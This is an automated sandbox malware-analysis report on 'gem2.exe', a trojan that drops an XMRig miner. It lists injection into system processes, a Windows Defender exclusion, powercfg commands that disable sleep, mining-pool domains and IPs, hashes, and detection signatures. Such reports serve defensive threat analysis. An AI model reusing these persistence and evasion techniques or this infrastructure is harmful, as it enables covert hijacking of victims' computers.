          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\Users\user\Desktop\gem2.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
          Source: C:\ProgramData\Screenshots\Lightshot.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
          Source: dialer.exe, 00000041.00000002.3310862683.000001DD5F649000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

          Mitre Att&ck Matrix

          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
          Windows Management Instrumentation          		1
          DLL Side-Loading          		1
          DLL Side-Loading          		1
          Disable or Modify Tools          		1
          Credential API Hooking          		1
          System Time Discovery          		Remote Services1
          Archive Collected Data          		1
          Encrypted Channel          		Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault Accounts2
          Native API          		11
          Windows Service          		1
          Access Token Manipulation          		1
          Deobfuscate/Decode Files or Information          		LSASS Memory1
          File and Directory Discovery          		Remote Desktop Protocol1
          Credential API Hooking          		1
          Non-Application Layer Protocol          		Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain Accounts1
          Service Execution          		Logon Script (Windows)11
          Windows Service          		2
          Obfuscated Files or Information          		Security Account Manager34
          System Information Discovery          		SMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol          		Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook713
          Process Injection          		1
          Install Root Certificate          		NTDS441
          Security Software Discovery          		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          DLL Side-Loading          		LSA Secrets2
          Process Discovery          		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          File Deletion          		Cached Domain Credentials131
          Virtualization/Sandbox Evasion          		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
          Rootkit          		DCSync1
          Application Window Discovery          		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
          Masquerading          		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
          Modify Registry          		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron131
          Virtualization/Sandbox Evasion          		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
          Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
          Access Token Manipulation          		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
          Gather Victim Org InformationDNS ServerCompromise Software Supply ChainWindows Command ShellScheduled TaskScheduled Task713
          Process Injection          		KeyloggingProcess DiscoveryTaint Shared ContentScreen CaptureDNSExfiltration Over Physical MediumResource Hijacking
          Determine Physical LocationsVirtual Private ServerCompromise Hardware Supply ChainUnix ShellSystemd TimersSystemd Timers1
          Hidden Files and Directories          		GUI Input CapturePermission Groups DiscoveryReplication Through Removable MediaEmail CollectionProxyExfiltration over USBNetwork Denial of Service

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1587388 Sample: gem2.exe Startdate: 10/01/2025 Architecture: WINDOWS Score: 100 57 pool.supportxmr.com 2->57 59 pool-fr.supportxmr.com 2->59 61 3 other IPs or domains 2->61 67 Malicious sample detected (through community Yara rule) 2->67 69 Multi AV Scanner detection for submitted file 2->69 71 Yara detected Xmrig cryptocurrency miner 2->71 73 10 other signatures 2->73 8 Lightshot.exe 1 2->8         started        12 gem2.exe 1 2 2->12         started        signatures3 process4 file5 51 C:\Windows\Temp\yycjbdwxjaoe.sys, PE32+ 8->51 dropped 75 Multi AV Scanner detection for dropped file 8->75 77 Modifies the context of a thread in another process (thread injection) 8->77 79 Adds a directory exclusion to Windows Defender 8->79 81 Sample is not signed and drops a device driver 8->81 14 dialer.exe 8->14         started        17 dialer.exe 8->17         started        20 powershell.exe 8->20         started        28 11 other processes 8->28 53 C:\ProgramData\Screenshots\Lightshot.exe, PE32+ 12->53 dropped 83 Uses powercfg.exe to modify the power settings 12->83 85 Modifies power options to not sleep / hibernate 12->85 22 dialer.exe 1 12->22         started        24 powershell.exe 23 12->24         started        26 cmd.exe 1 12->26         started        30 13 other processes 12->30 signatures6 process7 dnsIp8 87 Injects code into the Windows Explorer (explorer.exe) 14->87 89 Creates a thread in another existing process (thread injection) 14->89 91 Injects a PE file into a foreign processes 14->91 41 4 other processes 14->41 55 141.94.96.144, 49704, 80 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese Germany 17->55 93 Query firmware table information (likely to detect VMs) 17->93 95 Found strings related to Crypto-Mining 17->95 97 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 17->97 32 conhost.exe 20->32         started        99 Contains functionality to inject code into remote processes 22->99 101 Writes to foreign memory regions 22->101 103 Allocates memory in foreign processes 22->103 105 Contains functionality to compare user and computer (likely to detect sandboxes) 22->105 34 lsass.exe 22->34 injected 37 winlogon.exe 22->37 injected 43 2 other processes 22->43 107 Loading BitLocker PowerShell Module 24->107 39 conhost.exe 24->39         started        45 2 other processes 26->45 47 11 other processes 28->47 49 13 other processes 30->49 signatures9 process10 signatures11 63 Installs new ROOT certificates 34->63 65 Writes to foreign memory regions 34->65

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          gem2.exe62%VirustotalBrowse
          gem2.exe66%ReversingLabsWin64.Trojan.MintZard

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\ProgramData\Screenshots\Lightshot.exe66%ReversingLabsWin64.Trojan.MintZard
          C:\Windows\Temp\yycjbdwxjaoe.sys5%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          https://172.94.1q0%Avira URL Cloudsafe
          http://3csp.icrosof4m/ocp00%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          pool-fr.supportxmr.com
          		141.94.96.195
          		truefalse
            		unknown
            bg.microsoft.map.fastly.net
            		199.232.210.172
            		truefalse
              		high
              default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com
              		217.20.57.35
              		truefalse
                		high
                pool.supportxmr.com
                		unknown
                		unknownfalse
                  		high

                  URLs from Memory and Binaries

                  NameSourceMaliciousAntivirus DetectionReputation
                  http://schemas.xmlsoap.org/ws/2005/07/securitypolicylsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                    		high
                    http://docs.oasis-open.org/ws-sx/ws-securitypolicy/200702lsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                      		high
                      http://schemas.xmlsoap.org/ws/2005/02/trustlsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                        		high
                        http://docs.oasis-open.org/ws-sx/ws-trust/200512lsass.exe, 00000024.00000000.2096621518.00000140AD850000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000002.3310067164.00000140AD850000.00000004.00000001.00020000.00000000.sdmpfalse
                          		high
                          http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdlsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                            		high
                            http://schemas.xmlsoap.org/ws/2004/09/policylsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                              		high
                              http://schemas.xmlsoap.org/wsdl/ertieslsass.exe, 00000024.00000002.3309932846.00000140AD82F000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                		high
                                http://schemas.xmlsoap.org/wsdl/soap12/lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                  		high
                                  http://3csp.icrosof4m/ocp0lsass.exe, 00000024.00000002.3311887155.00000140AE074000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000024.00000000.2096998931.00000140AE074000.00000004.00000001.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  http://schemas.xmlsoap.org/wsdl/lsass.exe, 00000024.00000000.2096595487.00000140AD82F000.00000004.00000001.00020000.00000000.sdmpfalse
                                    		high
                                    https://172.94.1qdialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://xmrig.com/docs/algorithmsdialer.exe, 00000041.00000002.3306534127.0000000140001000.00000040.00000001.00020000.00000000.sdmpfalse
                                      		high

                                      World Map of Contacted IPs

                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs

                                      Public IPs

                                      IPDomainCountryFlagASNASN NameMalicious
                                      141.94.96.144
                                      		unknownGermany
                                      		680DFNVereinzurFoerderungeinesDeutschenForschungsnetzesetrue

                                      General Information

                                      Joe Sandbox version:42.0.0 Malachite
                                      Analysis ID:1587388
                                      Start date and time:2025-01-10 10:15:08 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 9m 36s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Number of analysed new started processes analysed:62
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:8
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:gem2.exe
                                      Detection:MAL
                                      Classification:mal100.spyw.evad.mine.winEXE@92/12@1/1
                                      EGA Information:
                                      • Successful, ratio: 100%
                                      HCA Information:Failed
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe

                                      Warnings

                                      • Exclude process from analysis (whitelisted): dllhost.exe, WmiPrvSE.exe
                                      • Excluded IPs from analysis (whitelisted): 20.12.23.50, 52.165.164.15, 13.85.23.206, 20.3.187.198, 40.126.32.72, 40.126.32.133, 40.126.32.138, 40.126.32.134, 40.126.32.136, 40.126.32.68, 40.126.32.76, 20.190.160.20, 13.107.246.45
                                      • Excluded domains from analysis (whitelisted): prdv4a.aadg.msidentity.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, www.tm.v4.a.prd.aadg.trafficmanager.net, ctldl.windowsupdate.com, d.4.1.9.1.6.7.1.0.0.0.0.0.0.0.0.1.0.0.9.0.0.1.f.1.1.1.0.1.0.a.2.ip6.arpa, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, login.live.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, www.tm.lg.prod.aadmsa.trafficmanager.net
                                      • Not all processes where analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                      • Report size getting too big, too many NtCreateKey calls found.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      • Report size getting too big, too many NtReadVirtualMemory calls found.

                                      Simulations

                                      Behavior and APIs

                                      TimeTypeDescription
                                      04:15:57API Interceptor1x Sleep call for process: gem2.exe modified
                                      04:15:59API Interceptor35x Sleep call for process: powershell.exe modified
                                      04:16:36API Interceptor419567x Sleep call for process: winlogon.exe modified
                                      04:16:37API Interceptor336396x Sleep call for process: lsass.exe modified
                                      04:16:37API Interceptor1114x Sleep call for process: svchost.exe modified
                                      04:16:40API Interceptor402155x Sleep call for process: dwm.exe modified
                                      04:16:42API Interceptor1854x Sleep call for process: dialer.exe modified

                                      Joe Sandbox View / Context

                                      IPs

                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                      141.94.96.144chrtrome22.exeGet hashmaliciousXmrigBrowse
                                        174.exeGet hashmaliciousXmrigBrowse
                                          file.exeGet hashmaliciousXmrigBrowse
                                            egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                              kWYLtJ0Cn1.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                FieroHack.exeGet hashmaliciousXmrigBrowse
                                                  h2UFp4aCRq.exeGet hashmaliciousLoaderBot, XmrigBrowse
                                                    curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse
                                                      curriculum_vitae-copie_(1).vbsGet hashmaliciousXmrigBrowse
                                                        curriculum_vitae-copie.vbsGet hashmaliciousXmrigBrowse

                                                          Domains

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          pool-fr.supportxmr.comchrtrome22.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          174.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          SecuriteInfo.com.Trojan.Siggen29.47910.18846.10721.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          file.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          egFMhHSlmf.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.71
                                                          xmr_linux_amd64 (2).elfGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          xmr_linux_amd64.elfGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          SecuriteInfo.com.Trojan.Siggen29.24758.13221.7276.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          Q3pEXxmWAD.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.195
                                                          default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comAppraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                          • 84.201.210.39
                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 217.20.57.25
                                                          82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                          • 217.20.57.23
                                                          Solara.exeGet hashmaliciousUnknownBrowse
                                                          • 217.20.57.35
                                                          Sales Acknowledgement - HES #982323.pdfGet hashmaliciousUnknownBrowse
                                                          • 84.201.210.39
                                                          file_83f986ef2d0592ef993924a8cc5b8d6a_2025-01-07_10_04_01_718000.zipGet hashmaliciousUnknownBrowse
                                                          • 217.20.57.36
                                                          Setup.exeGet hashmaliciousLummaCBrowse
                                                          • 217.20.57.18
                                                          Insomia.exeGet hashmaliciousLummaCBrowse
                                                          • 84.201.210.35
                                                          T1#U5b89#U88c5#U53052.0.6.msiGet hashmaliciousUnknownBrowse
                                                          • 84.201.210.34
                                                          dGhlYXB0Z3JvdXA=-free.exeGet hashmaliciousUnknownBrowse
                                                          • 84.201.210.22
                                                          bg.microsoft.map.fastly.net1736491685cd440ba02224486139c45779065ac91a3edb422c48d3d3c6920c4d30fc9d2bfc582.dat-decoded.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                                          • 199.232.210.172
                                                          gqIYXW7GfB.exeGet hashmaliciousDCRatBrowse
                                                          • 199.232.214.172
                                                          https://ik.imagekit.io/nrof2h909/Sherman%20Pruitt,%20Chief%20of%20Police,%20MSCJ.pdf?updatedAt=1736444487005Get hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          https://marcuso-wq.github.io/home/Get hashmaliciousHTMLPhisherBrowse
                                                          • 199.232.214.172
                                                          1Ta6ojwHc6.exeGet hashmaliciousDCRatBrowse
                                                          • 199.232.210.172
                                                          Nuevo-orden.xla.xlsxGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          Appraisal-nation-Review_and_Signature_Request46074.pdfGet hashmaliciousUnknownBrowse
                                                          • 199.232.214.172
                                                          new.batGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          MDE_File_Sample_c404ec52446527b77da6860ca493ea2007ac03d5.zipGet hashmaliciousUnknownBrowse
                                                          • 199.232.210.172
                                                          JB#40044 Order.exeGet hashmaliciousMassLogger RATBrowse
                                                          • 199.232.210.172

                                                          ASNs

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          DFNVereinzurFoerderungeinesDeutschenForschungsnetzesearmv4l.elfGet hashmaliciousUnknownBrowse
                                                          • 195.37.28.224
                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                          • 134.245.99.176
                                                          armv7l.elfGet hashmaliciousUnknownBrowse
                                                          • 139.19.193.179
                                                          https://www.bing.com/ck/a?!&&p=3c39a9f42e445bf68e8df296bb1fae53d0c972b7afa34ab05d6ca3737dc8872cJmltdHM9MTczNjM4MDgwMA&ptn=3&ver=2&hsh=4&fclid=2ffa23fd-270b-62aa-06ef-300e230b6c77&u=a1aHR0cHM6Ly93d3cuYmluZy5jb20vYWxpbmsvbGluaz91cmw9aHR0cHMlM2ElMmYlMmZ3d3cuYWxwaGFzdXJhbmNlLmNvbSUyZiZzb3VyY2U9c2VycC1sb2NhbCZoPUE1Z0FJY1RpY2tXbGRHJTJidFFwJTJmY0dnQ3Z3Tmg4UmZjRXBwQmdUTGlNOEtNJTNkJnA9bHdfdHAmaWc9QTlFRTIyOTNCQzJGNDgyMDlGMTkyNEFBOUQ4MTUyNkYmeXBpZD1ZTjg3M3gxNzg2NjcxMDE2NTE1NDQyOTA3NA&ntb=1Get hashmaliciousUnknownBrowse
                                                          • 141.95.100.236
                                                          https://t.co/qNQo33w8wDGet hashmaliciousHTMLPhisherBrowse
                                                          • 141.95.98.65
                                                          chrtrome22.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144
                                                          http://hockey30.comGet hashmaliciousUnknownBrowse
                                                          • 141.95.171.140
                                                          https://hockey30.com/nouvelles/malaise-en-conference-de-presse-kent-hughes-envoie-un-message-cinglant-a-juraj-slafkovsky/Get hashmaliciousUnknownBrowse
                                                          • 141.95.171.140
                                                          n397UdH3b5.exeGet hashmaliciousWannacry, ContiBrowse
                                                          • 131.188.40.189
                                                          174.exeGet hashmaliciousXmrigBrowse
                                                          • 141.94.96.144

                                                          JA3 Fingerprints

                                                          No context

                                                          Dropped Files

                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          C:\Windows\Temp\yycjbdwxjaoe.syschrtrome22.exeGet hashmaliciousXmrigBrowse
                                                            pTVKHqys2h.exeGet hashmaliciousXmrigBrowse
                                                              174.exeGet hashmaliciousXmrigBrowse
                                                                file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XWorm, XmrigBrowse
                                                                  47SXvEQ.exeGet hashmaliciousBlank Grabber, XmrigBrowse
                                                                    xmr new.exeGet hashmaliciousXmrigBrowse
                                                                      eth.exeGet hashmaliciousXmrigBrowse
                                                                        file.exeGet hashmaliciousXmrigBrowse
                                                                          hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
                                                                            5fr5gthkjdg71.exeGet hashmaliciousQuasar, R77 RootKitBrowse

                                                                              Created / dropped Files

                                                                              C:\ProgramData\Screenshots\Lightshot.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\gem2.exe
                                                                              File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):2876416
                                                                              Entropy (8bit):6.537334125155787
                                                                              Encrypted:false
                                                                              SSDEEP:49152:lYul8CapE2jLY0vFhbkQbIptv1xZ4ayOIYDIGC3FYKjPgz+WWrS2sWioLyVQGMNx:lYLCGYYbkQbytvVeOIerC1zPgSWW/pio
                                                                              MD5:990A3F3B1273510F210FB9B541DA219F
                                                                              SHA1:33E536C5B4BDB6F6042F93445DFFD8A3AD488E8B
                                                                              SHA-256:35A8D03F86AE6F92424D6424FE0805D338ECCEDFF177B400182102685299022C
                                                                              SHA-512:495734313CAE980D3F48EF78422CF9484EB347833672FD5C693F8F8C92C1C0D51986795CD55A3148BE18FF0C9D36ADFF5A1C3FF18200668DD33F3978A459C246
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 66%
                                                                              Preview:MZx.....................@...................................x...hr......!..L.!This program cannot be run in DOS mode.$..PE..d......g.........."..........N+.....@..........@.............................p,...........`.................................................x...<....P,.P.... ,..............`,.x...............................(.......8...............X............................text...f........................... ..`.rdata... ......."..................@..@.data....1+...... +.................@....pdata....... ,.......+.............@..@.00cfg.......0,.......+.............@..@.tls.........@,.......+.............@....rsrc...P....P,.......+.............@..@.reloc..x....`,.......+.............@..B........................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1940658735648508
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul3nqth:NllUa
                                                                              MD5:851531B4FD612B0BC7891B3F401A478F
                                                                              SHA1:483F0D1E71FB0F6EFF159AA96CC82422CF605FB3
                                                                              SHA-256:383511F73A5CE9C50CD95B6321EFA51A8C6F18192BEEBBD532D4934E3BC1071F
                                                                              SHA-512:A22D105E9F63872406FD271EF0A545BD76974C2674AEFF1B3256BCAC3C2128B9B8AA86B993A53BF87DBAC12ED8F00DCCAFD76E8BA431315B7953656A4CB4E931
                                                                              Malicious:false
                                                                              Preview:@...e.................................&..............@..........

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01nv4rv3.nkt.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0wriahtp.qpd.psm1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sm24etzm.lii.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yspndyca.3zx.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):64
                                                                              Entropy (8bit):1.1510207563435464
                                                                              Encrypted:false
                                                                              SSDEEP:3:Nlllul2lllllZ:NllUClll
                                                                              MD5:4D98AF7F487E62A9C1D44B02674BAB7E
                                                                              SHA1:1B492B2208949EB7F18C32F309C296B4258DBA65
                                                                              SHA-256:1E3ED9CE6343DA27C6759A0F05D6DD0B92B3A9C63B6492A2DA4E4F371D9F56DA
                                                                              SHA-512:60EC859B84836E865E767FE858E70ACEC6F0FB8077B2E51D6CB4095533433B791C9A16396D69279C7F896DF003A1ED6656087B43EFA16523DA4026317CBB49E6
                                                                              Malicious:false
                                                                              Preview:@...e.................................:..............@..........

                                                                              C:\Windows\Temp\__PSScriptPolicyTest_b43v2i2m.ol2.ps1

                                                                              Download File
                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
